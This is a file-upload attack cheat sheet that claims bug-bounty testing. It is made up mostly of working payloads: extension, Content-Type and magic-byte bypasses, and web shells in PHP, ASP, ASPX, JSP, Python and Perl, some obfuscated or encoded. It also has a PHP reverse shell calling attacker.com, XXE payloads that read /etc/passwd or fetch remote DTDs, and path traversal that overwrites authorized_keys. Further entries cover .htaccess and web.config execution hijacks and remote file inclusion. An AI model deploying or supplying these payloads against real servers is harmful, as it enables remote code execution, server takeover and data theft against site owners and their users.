# File Upload Vulnerability Payloads (2020-2025 Bug Bounty Tested)
# ============================
# FILE EXTENSION BYPASSES
# ============================
# Double Extensions
shell.php.jpg
shell.php.png
shell.php.gif
shell.php.pdf
shell.php.txt
shell.jpg.php
shell.png.php
exploit.asp.jpg
exploit.aspx.png
backdoor.jsp.gif
# Case Variations
shell.PHP
shell.PhP
shell.pHp
shell.Php
shell.PHp
shell.ASP
shell.ASPX
shell.AsP
shell.JSP
# Null Byte Injection (older systems)
shell.php%00.jpg
shell.php%00.png
shell.php\x00.jpg
shell.asp%00.gif
exploit.jsp%00.pdf
# Special Characters
shell.php.....
shell.php%20
shell.php%0a
shell.php%00
shell.php%0d%0a
shell.php::$DATA
shell.php::$INDEX_ALLOCATION
# Alternate Extensions (PHP)
shell.php3
shell.php4
shell.php5
shell.php7
shell.phtml
shell.phar
shell.phpt
shell.pgif
shell.pht
shell.inc
shell.hphp
shell.ctp
# Alternate Extensions (ASP/ASPX)
shell.asp
shell.aspx
shell.asa
shell.asax
shell.ascx
shell.ashx
shell.asmx
shell.cer
shell.config
shell.soap
shell.rem
# Alternate Extensions (JSP)
shell.jsp
shell.jspx
shell.jsw
shell.jsv
shell.jspf
# Other Language Extensions
shell.pl
shell.pm
shell.cgi
shell.py
shell.pyc
shell.rb
shell.rbw
shell.sh
shell.bash
# Executable Extensions
malware.exe
backdoor.bat
script.cmd
payload.ps1
reverse.sh
# Server Config Files
.htaccess
.htpasswd
web.config
httpd.conf
.user.ini
php.ini
# ============================
# CONTENT-TYPE BYPASSES
# ============================
# Common Content-Type Headers to Test:
# Legitimate-looking Content-Type values sent with malicious file content
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Content-Type: image/bmp
Content-Type: image/svg+xml
Content-Type: application/pdf
Content-Type: application/zip
Content-Type: text/plain
Content-Type: text/csv
Content-Type: application/octet-stream
Content-Type: video/mp4
Content-Type: audio/mpeg
# Empty or null
Content-Type:
Content-Type: null
Content-Type: undefined
# Malformed
Content-Type: image/jpeg; charset=binary
Content-Type: multipart/form-data; boundary=something
# ============================
# MAGIC BYTES (File Signatures)
# ============================
# PHP Web Shell with JPEG Header
FF D8 FF E0 (JPEG magic bytes)
<?php system($_GET['cmd']); ?>
# PHP Web Shell with PNG Header
89 50 4E 47 0D 0A 1A 0A (PNG magic bytes)
<?php system($_GET['cmd']); ?>
# PHP Web Shell with GIF Header
GIF89a
<?php system($_GET['cmd']); ?>
# PHP Web Shell with PDF Header
%PDF-1.4
<?php system($_GET['cmd']); ?>
# PHP Web Shell with ZIP Header
PK (ZIP magic bytes)
<?php system($_GET['cmd']); ?>
# ============================
# POLYGLOT FILES (Valid Image + Valid Code)
# ============================
# GIF + PHP Polyglot
GIF89a<?php system($_GET['cmd']); ?>
# JPEG + PHP Polyglot (with comment)
# Add PHP code in JPEG comment section
# Use exiftool: exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# PNG + PHP Polyglot
# Use PNG ancillary chunks to hide PHP code
# BMP + PHP Polyglot
# BMP header followed by PHP code in pixel data
# ============================
# WEB SHELL PAYLOADS
# ============================
# === PHP Web Shells ===
# Simple PHP Shell
<?php system($_GET['cmd']); ?>
# PHP Shell with POST
<?php system($_POST['cmd']); ?>
# PHP Eval Shell
<?php eval($_REQUEST['cmd']); ?>
# PHP Passthru Shell
<?php passthru($_GET['cmd']); ?>
# PHP Exec Shell
<?php echo exec($_GET['cmd']); ?>
# PHP Shell_exec
<?php echo shell_exec($_GET['cmd']); ?>
# PHP Backdoor
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
# PHP File Manager Shell
<?php
if(isset($_GET['file'])){
echo file_get_contents($_GET['file']);
}
if(isset($_FILES['upload'])){
move_uploaded_file($_FILES['upload']['tmp_name'], $_FILES['upload']['name']);
}
?>
# PHP One-liner Shells
<?=`$_GET[x]`?>
<?=system($_GET[x]);?>
<?=shell_exec($_GET[x]);?>
<?=passthru($_GET[x]);?>
<?=exec($_GET[x]);?>
# Obfuscated PHP Shell
<?php $a=$_GET['a'];$b=$_GET['b'];$a($b);?>
<?php @eval($_POST['x']);?>
<?php @assert($_POST['x']);?>
<?php $f='sys'.'tem';$f($_GET['x']);?>
# PHP Reverse Shell
<?php
$sock=fsockopen("attacker.com",4444);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
# === ASP/ASPX Web Shells ===
# ASP Shell
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Response.Write(oScript.Exec("cmd /c " & Request.QueryString("cmd")).StdOut.ReadAll())
%>
# ASPX Shell
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e){
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + Request.QueryString["cmd"];
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.UseShellExecute = false;
p.Start();
Response.Write(p.StandardOutput.ReadToEnd());
}
</script>
# ASPX One-liner
<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
# === JSP Web Shells ===
# JSP Shell
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
int i;
while((i = in.read()) != -1) {
out.print((char)i);
}
%>
# JSP One-liner
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
# === Python Web Shell ===
#!/usr/bin/env python
import os
import cgi
form = cgi.FieldStorage()
cmd = form.getvalue('cmd')
os.system(cmd)
# === Perl Web Shell ===
#!/usr/bin/perl
use CGI;
$q = CGI->new;
print $q->header;
print `$q->param('cmd')`;
# ============================
# XSS VIA FILE UPLOAD
# ============================
# HTML File Upload
<html>
<body>
<script>alert(document.cookie)</script>
</body>
</html>
# SVG File Upload with XSS
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
# SVG with XSS (onload)
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
# PDF with XSS (if rendered in browser)
%PDF-1.4
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction << /S /JavaScript /JS (app.alert('XSS');) >>
>>
endobj
# XML with XSS
<?xml version="1.0"?>
<!DOCTYPE html [
<!ENTITY js "alert(document.domain)">
]>
<html>
<body>
<script>&js;</script>
</body>
</html>
# ============================
# XXE VIA FILE UPLOAD
# ============================
# SVG with XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
# XML with XXE
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
# XXE - Parameter Entity
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<foo>&exfil;</foo>
# XXE - Blind OOB
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker.com/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
# ============================
# PATH TRAVERSAL IN FILENAME
# ============================
# Directory Traversal
../../../etc/passwd
..\..\..\..\windows\system32\config\sam
....//....//....//etc/passwd
# Overwrite Important Files
../../../var/www/html/index.php
../../../.ssh/authorized_keys
../../config.php
../../../.htaccess
../../wp-config.php
# Filename with Path Traversal
../../../../tmp/shell.php
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
# ============================
# HTACCESS FILE UPLOAD
# ============================
# .htaccess to Execute PHP
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
# .htaccess to Execute All Files as PHP
AddType application/x-httpd-php .
SetHandler application/x-httpd-php
# .htaccess to Bypass Upload Restrictions
<FilesMatch "\.ph(p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
# ============================
# WEB.CONFIG FILE UPLOAD (IIS)
# ============================
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers>
<add name="PHP_via_FastCGI"
path="*.jpg"
verb="*"
modules="FastCgiModule"
scriptProcessor="C:\PHP\php-cgi.exe"
resourceType="Unspecified" />
</handlers>
</system.webServer>
</configuration>
# ============================
# ARCHIVE-BASED ATTACKS
# ============================
# ZIP Slip - Malicious Archive
# Create zip file with: ../../../../var/www/html/shell.php
# ZIP with Symlink
# ln -s /etc/passwd passwd.txt
# zip --symlinks payload.zip passwd.txt
# TAR with Path Traversal
# tar -cf payload.tar ../../../../var/www/html/shell.php
# Zip Bomb (DoS)
# Create highly compressed file that expands to huge size
# ============================
# IMAGE METADATA INJECTION
# ============================
# EXIF Data with XSS (if displayed)
exiftool -Comment='<script>alert(1)</script>' image.jpg
# EXIF Data with PHP Code
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# IPTC Data Injection
exiftool -IPTC:Caption-Abstract='<?php eval($_POST["x"]); ?>' image.jpg
# ============================
# SERVER-SPECIFIC BYPASSES
# ============================
# Apache
shell.php.jpg (with .htaccess: AddType application/x-httpd-php .jpg)
.htaccess file to execute images as PHP
# IIS
shell.asp;.jpg
shell.asp:.jpg
web.config to execute images as ASP
# Nginx
shell.php%00.jpg (older versions)
Upload to misconfigured alias/location
# Tomcat
shell.jsp%00.jpg
shell.jspx
# ============================
# RACE CONDITION FILE UPLOAD
# ============================
# Upload the file and request it before server-side validation or deletion completes
# Technique: Concurrent upload and access requests
# Example: Upload shell.php and immediately request http://target.com/uploads/shell.php
# Use tools like Burp Suite Turbo Intruder or custom scripts to send simultaneous requests
# ============================
# FILE UPLOAD WITH SIZE BYPASS
# ============================
# Small malicious file
<?=`$_GET[0]`?>
# Compressed PHP shell
<?=`{$_GET[0]}`;
# ============================
# MIME TYPE CONFUSION
# ============================
# Upload with different MIME types
Content-Type: application/x-php
Content-Type: application/x-httpd-php
Content-Type: application/php
Content-Type: text/php
Content-Type: text/x-php
# ============================
# POLYGLOT FILES FOR MULTIPLE FORMATS
# ============================
# JPEG + JAR Polyglot (for Java apps)
# Valid JPEG and valid JAR simultaneously
# PDF + HTML Polyglot
%PDF-1.4
<html><script>alert(1)</script></html>
# GIF + JavaScript
GIF89a/*<?php
<script>alert(1)</script>
<?php */;
# ============================
# MODERN BYPASS TECHNIQUES (2023-2025)
# ============================
# Unicode Tricks (Right-to-Left Override, U+202E)
shell.php%E2%80%AE.jpg (Right-to-Left Override)
shellgpj.php (RLO character)
# Homoglyph Attacks
shell.рhр (Cyrillic р instead of Latin p)
shell.рhр
# UTF-8 BOM (invisible EF BB BF bytes prefixed to the payload below)
<?php system($_GET['cmd']); ?>
# Long Filename DoS
# Create extremely long filename to bypass validation
# Multiple Content-Disposition
Content-Disposition: form-data; name="file"; filename="safe.jpg"
Content-Disposition: form-data; name="file"; filename="shell.php"
# Null Session (Windows)
\\127.0.0.1\c$\inetpub\wwwroot\shell.php
# Case Sensitivity Issues
ShElL.PhP
SHELL.php
Shell.PHP
# ============================
# FRAMEWORK-SPECIFIC BYPASSES
# ============================
# WordPress
wp-content/uploads/shell.php
wp-content/themes/shell.php
wp-content/plugins/shell.php
# Drupal
sites/default/files/shell.php
# Joomla
media/shell.php
images/shell.php
# Laravel
storage/app/shell.php
public/uploads/shell.php
# Django
media/uploads/shell.py
# ============================
# REMOTE FILE INCLUSION VIA UPLOAD
# ============================
# Upload file containing:
<?php include($_GET['file']); ?>
<?php require($_GET['file']); ?>
<?php include_once($_GET['file']); ?>
# Then access with:
?file=http://attacker.com/shell.txt
?file=php://input (with POST data containing PHP code)
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
# ============================
# FILE UPLOAD WITH SSRF
# ============================
# Upload file that triggers SSRF
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="http://internal-server/admin"/>
</svg>
# ============================
# DESERIALIZATION VIA FILE UPLOAD
# ============================
# PHP Phar Deserialization
# Upload malicious .phar file
# Trigger via: file_get_contents('phar://uploads/payload.phar/test.txt')
# Java Deserialization
# Upload serialized Java object
# Trigger if application deserializes uploaded files
# ============================
# EICAR TEST FILE (AV detection test — checks whether uploads are scanned)
# ============================
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
# ============================
# BINARY PAYLOAD ENCODINGS
# ============================
# Base64 Encoded Shell
<?php eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>
# Hex Encoded
<?php eval(hex2bin("73797374656d28245f4745545b27636d64275d293b")); ?>
# ROT13
<?php eval(str_rot13("flfgrz($_TRG['pzq']);")); ?>
# ============================
# ALTERNATIVE DATA STREAMS (Windows/NTFS)
# ============================
shell.php::$DATA
shell.asp::$DATA
payload.txt:hidden.php